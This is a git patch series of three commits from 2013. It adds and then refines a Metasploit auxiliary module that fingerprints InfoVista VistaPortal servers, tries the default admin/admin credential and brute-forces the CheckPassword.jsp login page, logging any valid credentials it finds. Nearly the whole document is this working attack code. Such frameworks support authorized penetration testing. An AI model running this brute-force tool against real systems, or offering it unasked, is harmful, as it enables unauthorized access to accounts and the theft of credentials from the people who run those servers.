From ba5943426137f58128a847918125826a615f4788 Mon Sep 17 00:00:00 2001 From: KarnGaneshen Date: Sat, 15 Jun 2013 17:16:26 +0530 Subject: [PATCH 1/3] added infovista module --- .../auxiliary/scanner/http/infovista_enum.rb | 136 ++++++++++++++++++ 1 file changed, 136 insertions(+) create mode 100644 modules/auxiliary/scanner/http/infovista_enum.rb diff --git a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb new file mode 100644 index 0000000000..eb053f0158 --- /dev/null +++ b/modules/auxiliary/scanner/http/infovista_enum.rb @@ -0,0 +1,136 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'rex/proto/http' +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + # + # CONSTANTS + # Used to check if remote app is InfoVista + # + + INFOVISTA_FINGERPRINT = 'InfoVista® VistaPortal®' + + def initialize(info={}) + super(update_info(info, + 'Name' => 'InfoVista VistaPortal Application Brute Force Login Utility', + 'Description' => %{ + This module attempts to scan for InfoVista VistaPortal Web Application, finds its version + and performs login brute force to identify valid credentials. + }, + 'Author' => + [ + 'Karn Ganeshen ', + ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), + OptString.new('TARGETURI', [true, "URI for Web login. Default: /VPortal/mgtconsole/CheckPassword.jsp", "/VPortal/mgtconsole/CheckPassword.jsp"]) + ], self.class) + end + + def run_host(ip) + unless is_app_infovista? + print_error("#{rhost}:#{rport} -> Application does not appear to be InfoVista VistaPortal. Module will not continue.") + return + end + + status = try_default_credential + return if status == :abort + + print_status("#{rhost}:#{rport} -> Brute-forcing...") + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + # + # What's the point of running this module if the app actually isn't InfoVista? + # + def is_app_infovista? + + res = send_request_cgi( + { + 'uri' => '/VPortal/', + 'method' => 'GET' + }) + + if (res and res.code == 200 and res.body.include?(INFOVISTA_FINGERPRINT)) + version_key = /PORTAL_VERSION = (.+)./ + version = res.body.scan(version_key).flatten[0].gsub('"','') + print_good("#{rhost}:#{rport} -> Application version is #{version}") + return true + else + return false + end + end + + # + # Test and see if the default credential works + # + def try_default_credential + user = 'admin' + pass = 'admin' + do_login(user, pass) + end + + # + # Brute-force the login page + # + def do_login(user, pass) + vprint_status("#{rhost}:#{rport} -> Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/VPortal/mgtconsole/CheckPassword.jsp', + 'method' => 'POST', + 'vars_post' => + { + 'Login' => user, + 'password' => pass + } + }) + + get_response = "\r\n" + + if (not res or res.code != 200 and res.body != "#{get_response}") + vprint_error("#{rhost}:#{rport} -> FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}") + return :skip_pass + else + print_good("#{rhost}:#{rport} -> SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + + report_hash = { + :host => rhost, + :port => rport, + :sname => 'InfoVista VistaPortal', + :user => user, + :pass => pass, + :active => true, + :type => 'password'} + + report_auth_info(report_hash) + return :next_user + end + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + print_error("#{rhost}:#{rport} -> HTTP Connection Failed, Aborting") + return :abort + end + end + +end From 3cd94f5025bee5441995b160aa5acb0039fce176 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 16 Jun 2013 11:50:40 -0500 Subject: [PATCH 2/3] Do final cleanup for infovista_enum --- .../auxiliary/scanner/http/infovista_enum.rb | 37 +++++++------------ 1 file changed, 14 insertions(+), 23 deletions(-) diff --git a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb index eb053f0158..bd8985d042 100644 --- a/modules/auxiliary/scanner/http/infovista_enum.rb +++ b/modules/auxiliary/scanner/http/infovista_enum.rb @@ -15,19 +15,12 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner - # - # CONSTANTS - # Used to check if remote app is InfoVista - # - - INFOVISTA_FINGERPRINT = 'InfoVista® VistaPortal®' - def initialize(info={}) super(update_info(info, 'Name' => 'InfoVista VistaPortal Application Brute Force Login Utility', 'Description' => %{ - This module attempts to scan for InfoVista VistaPortal Web Application, finds its version - and performs login brute force to identify valid credentials. + This module attempts to scan for InfoVista VistaPortal Web Application, finds its + version and performs login brute force to identify valid credentials. }, 'Author' => [ @@ -46,14 +39,14 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_app_infovista? - print_error("#{rhost}:#{rport} -> Application does not appear to be InfoVista VistaPortal. Module will not continue.") + print_error("#{rhost}:#{rport} - Application does not appear to be InfoVista VistaPortal. Module will not continue.") return end status = try_default_credential return if status == :abort - print_status("#{rhost}:#{rport} -> Brute-forcing...") + print_status("#{rhost}:#{rport} - Brute-forcing...") each_user_pass do |user, pass| do_login(user, pass) end @@ -70,10 +63,10 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) - if (res and res.code == 200 and res.body.include?(INFOVISTA_FINGERPRINT)) + if (res and res.code == 200 and res.body =~ /InfoVista.*VistaPortal/) version_key = /PORTAL_VERSION = (.+)./ version = res.body.scan(version_key).flatten[0].gsub('"','') - print_good("#{rhost}:#{rport} -> Application version is #{version}") + print_good("#{rhost}:#{rport} - Application version is #{version}") return true else return false @@ -93,11 +86,11 @@ class Metasploit3 < Msf::Auxiliary # Brute-force the login page # def do_login(user, pass) - vprint_status("#{rhost}:#{rport} -> Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { - 'uri' => '/VPortal/mgtconsole/CheckPassword.jsp', + 'uri' => target_uri.to_s, 'method' => 'POST', 'vars_post' => { @@ -106,13 +99,10 @@ class Metasploit3 < Msf::Auxiliary } }) - get_response = "\r\n" - - if (not res or res.code != 200 and res.body != "#{get_response}") - vprint_error("#{rhost}:#{rport} -> FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}") - return :skip_pass + if (not res or res.code != 200 or res.body !~ /location.href.*AdminFrame\.jsp/) + vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}") else - print_good("#{rhost}:#{rport} -> SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_hash = { :host => rhost, @@ -121,14 +111,15 @@ class Metasploit3 < Msf::Auxiliary :user => user, :pass => pass, :active => true, - :type => 'password'} + :type => 'password' + } report_auth_info(report_hash) return :next_user end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - print_error("#{rhost}:#{rport} -> HTTP Connection Failed, Aborting") + print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting") return :abort end end From d20f72a9fd047fff4e2a2319e96f7b1302f7b2d6 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 16 Jun 2013 15:18:19 -0500 Subject: [PATCH 3/3] Fix indentation --- .../auxiliary/scanner/http/infovista_enum.rb | 27 +++++++++---------- 1 file changed, 13 insertions(+), 14 deletions(-) diff --git a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb index bd8985d042..60ae668113 100644 --- a/modules/auxiliary/scanner/http/infovista_enum.rb +++ b/modules/auxiliary/scanner/http/infovista_enum.rb @@ -56,21 +56,20 @@ class Metasploit3 < Msf::Auxiliary # What's the point of running this module if the app actually isn't InfoVista? # def is_app_infovista? + res = send_request_cgi( + { + 'uri' => '/VPortal/', + 'method' => 'GET' + }) - res = send_request_cgi( - { - 'uri' => '/VPortal/', - 'method' => 'GET' - }) - - if (res and res.code == 200 and res.body =~ /InfoVista.*VistaPortal/) - version_key = /PORTAL_VERSION = (.+)./ - version = res.body.scan(version_key).flatten[0].gsub('"','') - print_good("#{rhost}:#{rport} - Application version is #{version}") - return true - else - return false - end + if (res and res.code == 200 and res.body =~ /InfoVista.*VistaPortal/) + version_key = /PORTAL_VERSION = (.+)./ + version = res.body.scan(version_key).flatten[0].gsub('"','') + print_good("#{rhost}:#{rport} - Application version is #{version}") + return true + else + return false + end end #